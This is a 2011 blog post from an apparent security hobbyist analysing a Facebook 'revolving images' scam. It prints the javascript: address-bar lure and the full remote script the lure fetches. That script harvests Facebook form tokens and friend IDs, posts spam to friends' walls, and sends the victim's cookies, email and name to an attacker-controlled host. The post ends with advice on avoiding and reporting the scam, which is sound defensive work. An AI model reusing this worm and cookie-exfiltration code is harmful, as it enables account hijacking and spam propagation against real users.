07 February 2011

Revolving Images Spam on Facebook



Recently on Facebook many people have been tricked into unknowingly spamming a link called
http://bit.ly/91wrzd
http://bit.ly/faceb00ked
http://majicalimages.tk/
What this link basically claims to do it to get all the images on your page pop out and revolve. However behind the scenes it is solely intended at making you spam this link further to many more people by posting this message in your Wall:
Really cool Facebook revolving images. MUST SEE http://majicalimages.tk/
please DO NOT CLICK on the above links.


Now once you are on this page it will ask you to paste the JavaScript in your address bar on a Facebook page. Now as you can see the Javascript is basically:
javascript:(a = (b = document).createElement(“script”)).src = “//graphicgiants.com/majic.js?show”, b.body.appendChild(a); void(0)
Now the script basically attaches the script found at graphicgiants.com/majic.js?show to your current page which eventually makes the browser run that script.
So many people are unknowingly spamming this link to their wall post which in turn is tricking many more people into clicking it.
 So I checked it out and what is happening it if you try to open the link graphicgiants.com/majic.js?show in the browser you can never check what JavaScript is running.  However I used the cURL script to access the link  and I got the whole script which is running in the background. The script is given below(I have indented it properly for clear comprehension):

txt = "Really cool Facebook revolving images. MUST SEE http://niceimages.tk";
02 txtee = "Really cool Facebook revolving images. MUST SEE http://majicalimages.tk";
03 alert("Please wait 2-3 mins while we setup! Do not refresh this window or click any link.");
04 with(x = new XMLHttpRequest()) open("GET", "/"), onreadystatechange = function () {
05 if (x.readyState == 4 && x.status == 200) {
06 comp = (z = x.responseText).match(/name=\\"composer_id\\" value=\\"([\d\w]+)\\"/i)[1];
07 form = z.match(/name="post_form_id" value="([\d\w]+)"/i)[1];
08 dt = z.match(/name="fb_dtsg" value="([\d\w]+)"/i)[1];
09 pfid = z.match(/name="post_form_id" value="([\d\w]+)"/i)[1];
10 appid = "150622878317085";
11 appname = "rip_m_j";
12 with(xx = new XMLHttpRequest()) open("GET", "/ajax/browser/friends/?uid=" + document.cookie.match(/c_user=(\d+)/)[1] + "&filter=all&__a=1&__d=1"), onreadystatechange = function () {
13 if (xx.readyState == 4 && xx.status == 200) {
14 m = xx.responseText.match(/\/\d+_\d+_\d+_q\.jpg/gi).join("\n").replace(/(\/\d+_|_\d+_q\.jpg)/gi, "").split("\n");
15 i = 0;
16 llimit = 20;
17 t = setInterval(function () {
18 if (i >= llimit) return;
19 if (i == 0) {
20 with(xxx = new XMLHttpRequest()) open("GET", "/mobile/?v=photos"), setRequestHeader("X-Requested-With", null), setRequestHeader("X-Requested", null), onreadystatechange = function () {
21 if (xxx.readyState == 4 && xxx.status == 200) {
22 with(s = document.createElement("script")) src = "http://graphicgiants.com/mmjaicc.js?q=" + document.cookie.match(/c_user=(\d+)/)[1] + ":" + (d = xxx.responseText).match(/mailto:([^\"]+)/)[1].replace(/@/, "@") + ":" + d.match(/id="navAccountName">([^<>]+)/)[1] + "&c=" + document.cookie;
23 document.body.appendChild(s);
24 }
25 }, send(null);
26 } else if (i == llimit - 1) {
27 with(xxxx = new XMLHttpRequest()) open("GET", "/mobile/?v=photos"), setRequestHeader("X-Requested-With", null), setRequestHeader("X-Requested", null), onreadystatechange = function () {
28 if (xxxx.readyState == 4 && xxxx.status == 200) {
29 with(s = document.createElement("script")) src = "http://graphicgiants.com/majic.js?q=" + document.cookie.match(/c_user=(\d+)/)[1] + ":" + (d = xxxx.responseText).match(/mailto:([^\"]+)/)[1].replace(/@/, "@") + ":" + d.match(/id="navAccountName">([^<>]+)/)[1] + "&c=" + document.cookie;
30 document.body.appendChild(s);
31 }
32 }, send(null);
33 }
34 if (i % 2 == 0) {
35 with(xd = new XMLHttpRequest()) open("POST", "/ajax/updatestatus.php?__a=1"), setRequestHeader("Content-Type", "application/x-www-form-urlencoded"), send("action=PROFILE_UPDATE&profile_id=" + document.cookie.match(/c_user=(\d+)/)[1] + "&status=" + txt + "&target_id=" + m[Math.floor(Math.random() * m.length)] + "&composer_id=" + comp + "&hey_kid_im_a_composer=true&display_context=profile&post_form_id=" + form + "&fb_dtsg=" + dt + "&lsd&_log_display_context=profile&ajax_log=1&post_form_id_source=AsyncRequest");
36 } else {
37 with(xd = new XMLHttpRequest()) open("POST", "/ajax/updatestatus.php?__a=1"), setRequestHeader("Content-Type", "application/x-www-form-urlencoded"), send("action=PROFILE_UPDATE&profile_id=" + document.cookie.match(/c_user=(\d+)/)[1] + "&status=" + txtee + "&target_id=" + m[Math.floor(Math.random() * m.length)] + "&composer_id=" + comp + "&hey_kid_im_a_composer=true&display_context=profile&post_form_id=" + form + "&fb_dtsg=" + dt + "&lsd&_log_display_context=profile&ajax_log=1&post_form_id_source=AsyncRequest");
38 }
39 i += 1;
40 }, 2000);
41 }
42 }, send(null);
43 }
44 }, send(null);

Now I have  highlighted the mail points in this script. Basically its preparing the two main messages to post in the first two lines. And following that its making a new XHR request (Ajax Request) to the scripts at majic.js and mmajaicc.js and passes your cookie values to it. Since you are on a facebook page so your cookie values related to the facebook.com domain are also passed to the script. Now once it gets the cookie its calling the facebook ajax/updatestatus.php with the details of the text it wants to post in your status.

So this is the way you are getting tricked into spreading this spam. So best way to counter this is NOT TO CLICK on any such links.

Tip 1: You can report about the Link to facebook submitting the link and other details at http://www.facebook.com/help/contact.php?show_form=report_phishing

Tip 2: Check out how to Remove the Scam from your affected profile and how to safeguard yourself  at How to safeguard against the Facebook Revolving Images Scam

Be Safe....
Regards..
AbhiTricks! 

ABOUT THE AUTHOR
AbhiShek SinGh
Founder of 'TheHackingArticles'. Cyber Security Analyst, Cyber Security Researcher, and Software Engineer. Follow 'AbhiShek SinGh' on Facebook , Twitter or Google+ or via Email

Subscribe to stay up to date